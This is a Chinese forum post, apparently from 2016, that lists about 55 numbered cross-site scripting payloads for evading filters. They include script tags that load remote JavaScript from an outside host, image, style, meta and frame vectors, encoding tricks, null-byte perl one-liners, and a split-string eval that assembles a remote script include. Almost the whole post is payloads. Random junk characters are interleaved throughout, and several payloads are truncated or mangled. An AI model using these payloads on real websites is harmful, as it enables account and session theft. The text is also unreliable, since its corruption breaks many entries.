(1)普通的XSS JavaScript注入+ E& F: N3 Q# Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& _& K3 k, ~! |; c7 G
(99)另类弹框
; }9 J' p. e# V/ N% ]$ s- l& E<q/oncut=alert()>1
# m; c# W! C$ ^* Q2 o6 ` u3 s P, ~<s/onclick=alert()>b5 F7 P/ u6 g4 G! \& \3 s
<XSS=" onclick="alert(1)//">clickme</SSX=">
3 Z. l {& m( N! [0 W2 [ <zzz onclick=alert`1`>clickme</zzz> " ?1 ~+ e. p! V% _% R7 O4 e
<a onclick=alert`1`>clickme</a>& {5 o% T4 @: ^4 {
<a=">clickme</a=">$ C9 O1 g6 N, Y) o& L
<a=">clickme</a>% H. K! x" d t1 O1 k8 m1 W
<z=">clickme</z=">7 L; k# j( n( k( q+ S
<z onclick=alert`1`>clickme</z>6 N; D O7 k" ]; t6 M. |
0 s0 p$ M6 R- o2 `
(2)IMG标签XSS使用JavaScript命令
+ c( x0 Y) z: h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& h* v r% ~2 c
9 E6 r; a7 [4 v5 H: }
(3)IMG标签无分号无引号
# F4 n B5 Y/ u ~ E- E: v<IMG SRC=javascript:alert(‘XSS’)>
8 @1 t6 D% v/ d% h5 V
. n" c! u& T( H6 p(4)IMG标签大小写不敏感
# ]2 e; M- Q- ?7 q<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- z2 ^. q4 G; z. o' m. h1 Z3 U
( _. m1 R( t5 L1 w5 o' k/ @; w# w(5)HTML编码(必须有分号)& j0 s: u) A& P; | M, t1 a7 ~
<IMG SRC=javascript:alert(“XSS”)>9 a2 P8 H" J3 v/ H$ `; ?: C/ f
4 O; D& e% I* s
(6)修正缺陷IMG标签. S+ }0 Q' }! K, f8 ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! i6 {( {- F5 _( _; N# W
) a$ J" [9 O, F# z3 ^5 U) d(7)formCharCode标签(计算器)9 z. A0 q' W( U( P$ }- h
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! D1 M" |; G% O; k( M! Q- i- v" I2 I. |- C, H
(8)UTF-8的Unicode编码(计算器)+ U ~ k* ?- e
<IMG SRC=jav..省略..S')>
a, B2 u" k! I6 X0 d/ v1 J! x* A: K! r" m( x6 |; k
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ H6 q: N8 Y3 I( u
<IMG SRC=jav..省略..S')>
+ Q2 W. @7 ] o3 d- [; \% C/ K
1 u( d2 V! ?( [; N(10)十六进制编码也是没有分号(计算器)
: K `* ~' J6 h# g' X% w<IMG SRC=\'#\'" /span>0 V! }. z0 I, H
' a {7 [9 k8 g+ H+ f: f$ C
(11)嵌入式标签,将Javascript分开
& ]& F+ O7 D- C) t( z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 j8 \& I9 L5 y T; r1 I3 A: E; B& @3 x8 q
(12)嵌入式编码标签,将Javascript分开
$ {6 ~/ ?' {1 \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: @! x- N4 J6 v9 H+ b$ O: o! Z+ L7 Q+ M$ [6 y
(13)嵌入式换行符
* a% U$ X# m; F% G6 e<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 [% G, O1 I. n. {9 {* ~4 I
4 f& ^6 g( K7 E0 Y ?5 V2 z% k(14)嵌入式回车
( O, H% ?5 [0 k; t6 |<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ {5 L: G/ `- q, }! {" g$ N( B
# c# Z' }1 A$ f6 n+ c/ v(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ }) j" u- l. ]& f) h" E9 S
<IMG SRC=\'#\'" /span>
: f7 V" c) i7 a% ~8 Z' @0 G3 j2 F7 Z8 O' c' ?- D1 C
(16)解决限制字符(要求同页面)4 w/ v+ Q# J0 C' Z1 Z
<script>z=’document.’</script>+ ?5 U+ \6 R0 a% H) n
<script>z=z+’write(“‘</script>9 i5 d0 ?1 R9 v) k) H
<script>z=z+’<script’</script>
/ ]6 D; y$ s1 m: `2 K! j' h<script>z=z+’ src=ht’</script>5 K! U: \' v. w" r" X2 R% n
<script>z=z+’tp://ww’</script>) t+ `; T9 c. Z2 {, r( a6 n6 e/ p H
<script>z=z+’w.shell’</script>( D: z, T( {( M Z, V! a
<script>z=z+’.net/1.’</script>
9 u- K" V N, d<script>z=z+’js></sc’</script>
% I T- \; Q1 J9 G<script>z=z+’ript>”)’</script>
# u, s. N6 u( M& A' l. s3 W4 j9 s<script>eval_r(z)</script>8 b7 M9 w m5 l: M9 ~+ H
! p/ U- K& H7 h2 @+ e% _(17)空字符
0 `. U: k+ k2 R+ u3 z0 P5 lperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ H2 d% B' W. T" V# U2 V6 u% r7 o4 Y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 u; q# i* n- h( Hperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" `/ }6 {7 l* D; w8 M7 T4 @+ t+ A2 }3 X, f3 j6 Q; a6 r1 k
(19)Spaces和meta前的IMG标签, O% l6 r: R/ E- k+ o
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>) S- m; ?3 O$ I
2 F3 @% ^. L+ v. A7 Z(20)Non-alpha-non-digit XSS# Z; ?; C, N3 W
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
* X& i1 i, ^# A. w- Z$ H0 @% v6 W" x
(21)Non-alpha-non-digit XSS to 2
( ~2 S0 m. X! _1 ?<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% n# U& C: K) L6 l9 A4 |9 F& R; u
' Z1 ]8 Q3 A7 `# ?(22)Non-alpha-non-digit XSS to 3
3 @" W1 E" e9 W9 N0 Y<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>2 K9 E: a- c5 `! j% U
1 C0 W6 T8 s2 K9 v: k( X(23)双开括号
- S! v" g) Z* Q3 u+ E; m+ w, \<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! U; ]4 v: ^/ R# T' v' F, \. R7 a& T( x+ b' Z9 k6 d5 m
(24)无结束脚本标记(仅火狐等浏览器)
. e0 P H& |$ M3 A<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 Z. w. ?+ h# ]& a$ C/ M
* s7 H* D$ @/ E% O0 \0 W$ E7 I- ^- ~(25)无结束脚本标记2
. Z7 K5 T6 z, Z/ k# v2 w6 P# g! G# _8 ^1 x* `<SCRIPT SRC=//3w.org/XSS/xss.js>; v4 H* ~! e" t( e8 k x" O) j' }
) b. p0 r3 M+ s(26)半开的HTML/JavaScript XSS
5 D# m/ U6 \5 i" L<IMG SRC=\'#\'" /span>
, Q( n$ k3 q& l; j. Z
4 [% c) y% Y+ w5 M |+ d& S4 u(27)双开角括号
; @1 {7 H0 `6 J<iframe src=http://3w.org/XSS.html <" R5 l7 i* h' B/ e4 t
8 \6 o" x4 V* T: ?7 T(28)无单引号 双引号 分号! E/ p8 k; G3 Z( K1 S; p# }# J
<SCRIPT>a=/XSS/
( Y$ w A( q1 p: N( T1 }alert(a.source)</SCRIPT>
9 U8 t5 s+ C0 i" s+ y1 b, J' q, N7 M+ U0 |! c
(29)换码过滤的JavaScript* z. V( I8 o7 S! X: y- \" s$ k
\”;alert(‘XSS’);//
; L6 Y8 E( d9 D
2 {8 w5 t" r) d T' @(30)结束Title标签3 p. ]8 K7 r8 d
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% w1 P8 G7 k# |" h9 U! l3 W9 {
! l5 B+ V" c5 F# ~) `4 x1 x$ `
(31)Input Image
' H' S& d; ^7 [ W, N9 _8 j7 A<INPUT SRC=\'#\'" /span>* k0 O+ b, b5 a" s9 D
6 K* f/ e6 l: x# i; x(32)BODY Image ^; m( s, s9 n* U, z- r5 B
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 [/ S/ ?' Q; c2 k/ D" ]
* Y0 \) f* c! d2 u7 g" w/ K$ I2 e(33)BODY标签
" S; h/ W7 q, p1 x) T" t. n<BODY(‘XSS’)>
8 y n: }: |7 X& V/ \1 Z5 e ]5 n. l
" Y: F$ [% c+ n6 ]* R(34)IMG Dynsrc
" {7 ?; S: h; h6 Z% z<IMG DYNSRC=\'#\'" /span>
/ a8 `& e/ x: e
# n- ~% D* }$ N( ~(35)IMG Lowsrc$ \* R8 \4 C) n ^
<IMG LOWSRC=\'#\'" /span>! @$ p/ `) u: r5 h+ G. S
3 F8 v# g3 c& C5 c# U6 M# V- D- M' d(36)BGSOUND
' H# X# O' v* D5 p) w<BGSOUND SRC=\'#\'" /span>
9 y3 @: S9 D/ W3 y2 j% O; n# M9 S2 L+ ?/ k/ q+ l. [! o4 I
(37)STYLE sheet$ S/ S. s& a$ P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; V( n: P5 R* e+ K& ?9 T/ \- {
3 E6 `2 u( \$ H
(38)远程样式表
; ?' L) \5 |- k6 C b<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% Q- c1 s- z9 W e% j" [/ [; n$ i( J$ ]& }# x" {
(39)List-style-image(列表式)
. P. K5 A. g$ P; v d; |<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ p2 v! |" \0 l2 w( R, Q9 P& A0 v5 x& o/ |
(40)IMG VBscript% R0 Q! W% `9 X4 d, W, Z
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
( D$ X, j0 q% t6 t- q. Z: n, b' {0 g! z, d+ h- a6 {0 k
(41)META链接url
! t$ X( y$ l% k, C<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ O! ~6 S& N9 u1 W& w" b& r. |6 \( R/ `+ p4 b
(42)Iframe: D. K: S. `/ g x6 ?# [
<IFRAME SRC=\'#\'" /IFRAME>
, v* U$ K. V( l
+ w4 E2 {# |8 A+ f9 H. H(43)Frame4 W0 p6 T% _; ~& A% p
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>6 F+ r D% |) f/ n
) _( z2 T G( u* i
(44)Table* M$ g* |5 R; u6 t2 }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 S+ j3 R; u: Q0 J) r. E7 y7 n, M% N% [8 G* }
(45)TD. m" m1 ~: O/ J5 _1 h+ {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' d8 y" l7 y: h+ {( a) d( t1 w/ @
) o" Q) K' \2 p9 i: {: r, m(46)DIV background-image
8 J1 T1 \5 m0 Y9 M. ]9 R<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 G I/ Y }3 C) b7 z1 B0 S& w
* M, h6 d/ j2 J2 k s! Q S
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
u; O% R! |0 e! w: P0 i0 I<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
. i" b# R4 X) C7 W, @$ M8 X4 Z
1 j# F. k3 @: k4 j+ F(48)DIV expression
3 g6 Q' T' a7 ?( p. o: M<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 d" a# }, K! K) T" g: {6 g- \
; e: g3 S( t+ Y8 c: _4 C(49)STYLE属性分拆表达- a+ b# w+ [/ U2 t |, t3 H; A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 S4 ?8 H+ U3 G6 P, U- W
% v2 {/ q0 @( }8 @: q(50)匿名STYLE(组成:开角号和一个字母开头)2 k) i- }( M7 K( a0 V, w
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( \; n3 b# N& s
. G. ^; b, D4 q M; C* Y(51)STYLE background-image
& g, G4 `3 ~% x8 j6 Q<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* B: v* x3 z! z) R1 g* V& K( r5 w
(52)IMG STYLE方式9 f) ^& l" f, m7 r0 S# _7 R
exppression(alert(“XSS”))’>
1 ?5 [$ M8 f, g1 e1 _
9 W( U+ V6 M/ [# A3 ]% ~% k(53)STYLE background) n6 W+ Y; g' w; w3 W
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. |* ], E/ J7 ~ Q
' b t8 s/ K, w(54)BASE
6 r/ S. I# P: n& _, P) @! n<BASE HREF=”javascript:alert(‘XSS’);//”>$ B8 M5 {+ g% I, l" j6 a
1 w5 f7 \# m- e(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: M3 G. D$ F5 s4 ?1 @
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>2 u9 \/ r! H: F" ~3 x
|
发表于 2016-4-28 10:06:15
收藏
支持
反对